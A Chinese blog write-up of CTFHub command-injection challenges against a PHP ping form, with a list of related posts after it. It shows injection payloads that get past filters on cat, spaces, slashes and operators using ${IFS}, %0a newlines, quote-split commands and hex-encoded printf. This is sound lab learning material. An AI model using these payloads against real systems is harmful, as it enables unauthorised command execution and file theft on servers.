CTFhub RCE 命令注入部分

最新推荐文章于 2025-05-29 11:14:57 发布
原创 最新推荐文章于 2025-05-29 11:14:57 发布 · 1.6k 阅读 · 7 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文详细介绍了如何在CTF挑战中应对各种命令注入过滤,包括使用管道、运算符、空格和目录分隔符的替代方法,以及绕过URL编码限制,通过十六进制转码来读取隐藏文件。

在这里插入图片描述
这种题其实已经比较熟悉了,使用 |,&&,;等分隔符对前面ping的内容进行隔断,然后执行自己的命令

任意值;ls

发现了除了目录下除了index.php外还有另一个php文件
输入 127.0.0.0;cat 21701615624125.php 发现确实多了个反馈的参数,但是看不到值,很疑惑后面知道了,这是因为cat命令反馈的值无法直接显示
这时有两个方法,一是直接查看源码
在这里插入图片描述源码里是能看到的
第二个方法是直接把命令改为

127.0.0.1;cat 27712282015742.php|base64

|可以把前面的输出作为输入参数加入后面的指令中,这里目的就是把前面的php内容进行base64编码后显示

这样可以正常显示在网页中

2.在输入中过滤了cat命令

直接用less、more这种cat的替代命令即可

3.过滤了空格

bash下,空格可以用以下符号代替

<,<>,%20(space),%09(tab),$IFS$9, ${IFS},$IFS

在Bash下测试了一下,<号最好用,其他符号暂时没看到效果

4.过滤目录分隔符

这个题稍微做了点改动,ls出的当前目录中不包含直接的flag,而是有一个文件夹,需要进入文件夹内查看flag
两次分别输入以下命令

2;cd flag_is_here&&ls

2;cd flag_is_here&&cat flag_144761056618798.php

&&号是前面的命令成功的情况下才执行后面的命令

5.过滤运算符

过滤了 |和&号,;号没有过滤,直接用常规方法解题即可

6.综合过滤

!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m))

过滤了 | & ; 空格 cat flag ctfhub

首先需要输入命令

127.0.0.1(分隔符)ls

常规分割符被过滤了,所以需要使用非常规的
linux中:%0a 、%0d 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a
在这里插入图片描述在这里输入命令

127.0.0.1%0als

上传的时候会经过url编码变为
在这里插入图片描述就达不到命令的目的了

因此,我们得直接在url上写参数127.0.0.1%0als
在这里插入图片描述得到文件位置

2.下一步需要输入命令
cd flag_is_here;ls
这里需要解决空格,flag,;号的问题

<<>、%20(space)、%09(tab)$IFS$9${IFS}$IFS$IFS$1

空格用以上符号代替
flag等在字符绕过的方式很多:
https://www.cnblogs.com/threesoil/p/12462349.html内有较多记载
我这里用一个十六进制的方式试试
cd<flag_is_here%0als

看了其他人的payload
最后两步的payload分别是

ip=127.0.0.1%0Als${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65%22)

ip=127.0.0.1%0Aca%27%27t${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65\x2F\x66\x6C\x61\x67\x5F\x32\x31\x37\x38\x38\x33\x31\x31\x36\x38\x38\x36\x30\x31\x2E\x70\x68\x70%22)

分别是ls flag_is_here
然后直接 cat flag_is_here/flag.php
其中的%22,%27是经过url编码过后的表示,原文应该是" ,’,即双引号和单引号。如果直接在url上写payload的话,不能经过Url编码,需要手动把双引号和单引号改为%22,%27表示,经过测试发现如果直接在Url上输入的话不改为%22,%27也可以

在这里插入图片描述在自己linux系统下测试了一下,完整的一个payload如上,十六进制为对应的字符串转码

这些绕过过滤的方式还需要继续学习

这里附带一句:字母和符号转换为对应的16进制码即是对应ASC码的16进制

补上一篇大佬的帖子,里面的内容不完全针对这个题,但是有很多可用的绕过技巧

https://www.cnblogs.com/threesoil/p/12462349.html

CTFHub 技能树 综合过滤
weixin_44732566的博客
03-08 2024
CTFHub 技能书 综合过滤 打开题目,源码已经出现了 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/"...
ctf php审计从题目中的过滤学习绕过
eliforsharon的博客
10-10 1636
目录基本介绍空格过滤 基本介绍 在进行ping命令执行时,能够通过截断来执行新的命令。 根据此原理来进行注入。 例子如下 ip=127.0.0.1;ls 空格过滤 考虑在进行命令注入时,过滤了空格,可以采用${IFS}、$IFS、$IFS$9的局部变量来表示分隔符,但考虑$IFS直接接字母时可能会被解析成其他变量,所以采用${IFS}固定变量,或者$IFS$9采用$9这个空字符来与后面字母分隔开来固定变量 ...
ctfhub(rce智慧树)
qq_62046696的博客
07-21 670
刚看完rce知识点做一下题,巩固一下、
江苏工匠杯-unseping&序列化,正则绕过(全网最简单的wp)
每天一小步,进步一大截
12-02 6320
in_array, 检查数组中是否存在某个值,如果method的变量为"ping",那么将执行下一行call_user_func_array()—调用回调函数(把一个数组参数作为回调函数的参数,第二个数组为被传入的索引数组),也就是说method为ping时,那么它的索引数组就是args变量,同时传入args变量也必须是数组才能执行语句。看到网上和官方wp解法极为复杂,其实要八进制编码等等,仔细思考方法不止一种呢,此篇是我刷php反序列化笔记,有什么不懂的可以私信我,或者留言,看到的我都会认真回复。
Linux文件系统--文件类型
Ucan_Uup的博客
09-08 1500
Linux中一切都是文件,文件类型有多种,使用ls -l命令可以查看文件属性,所显示结果的第一列的第一个字符用来表示文件类型,如下: 1.普通文件 第一列第一个字符为“-”的文件为普通文件。 创建普通文件我们用:touch newfile 命令 删除普通文件我们用:rm newfile 命令 2.目录文件 第一列第一个字符为“d”(directory)的文件为目录文件。 创建目录文件我们用:mkdir directory 命令 删除空目录文件我们用:rmdir directory 命令 删除非空目录文件
ctfhub-web技能树笔记
2301_80038718的博客
10-31 996
phpinfo() 是php中查看相关信息的函数,当在页面中执行phpinfo()函数时,php会将自身的所有信息全部打印出来。在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容以 index.php 为例:第一次产生的交换文件名为。**eval()**函数是可以把一串字符串作为PHP代码执行,**system()**函数的作用为执行系统命令并输出执行结果。使用curl通过网站访问bak文件,解决文件泄露的问题。
7、ctfhub技能树_web_RCE
最新发布
YanLucyqi的博客
05-29 1157
(3)输入1.1.1.1&cat$IFS$9flag_319031051230486.php,点击ping,按F12打开网站源码,得到flag为ctfhub{4734f1bd73d4e86b5c4c9002}_36941055321623.php),用%0a代替分隔符,${IFS}代替空格,%09*代替flag,按F12打开网站源码,得到flag为ctfhub{5e8b611b7c14c1e00c387489}>,点击Send,得到flag为ctfhub{cb14169ce1e41796730b1a49}
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1295
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
第三周实训作业
jiang4152的博客
11-14 220
rce 部分:eval执行 命令注入 过滤cat。
Web安全攻防世界04 unseping(江苏工匠杯)
weixin_42789937的博客
12-01 2211
Web安全攻防世界04 unseping(江苏工匠杯)参考大佬们的WP有所补充,时隔多月再次整理博文,修复了原来不明白的点,内容小白友好~
CTFHub-rce
CN天狼
02-19 1547
CTFHub-rce
CTFshow web53 web54
ChenD的学习笔记
11-10 847
CTFshow web53 web54
CTFhub——命令执行
墨子辰的博客
02-04 1539
目录NO.1 无过滤注入NO.2 过滤catNO.3 过滤空格NO.4 过滤目录分隔符NO.5 过滤运算符NO.6 综合过滤练习 NO.1 无过滤注入 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> 代码中没有任何过滤 ?ip=|cat 307092239529587.p
CTFHub技能树RCE命令注入
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
03-19 5796
1.命令注入 // 关键代码 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip, $cmd = "ping -c 4 {$_GET['ip']}";// 运行命令,可以拼接 exec($cmd, $res);// 执行cmd,把结果输出到res } if ($res) { ...
ctfhub_REC_综合练习
devil8123665的博客
12-29 1299
目录 1 打开题目,查看如下源码 2代码分析 3查看当前路径 4查看flag_is_here目录 5获取flag值 6使用的python脚本 1 打开题目,查看如下源码 <?php ​ $res = FALSE; ​ if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|cat|...
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 1万+
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
CTFHub-web详解
shayebudon的博客
11-20 3782
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 6866
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
命令注入————ctfhub(过滤cat、空格、目录分隔符、运算符、综合过滤练习)
热门推荐
qq_45655564的博客
05-30 1万+
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFHub~RCE远程代码执行-命令注入
weixin_67832625的博客
08-06 978
本篇详细介绍了CTFHubRCE远程代码执行漏洞的过程和解题步骤,有什么问题随时联系者
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值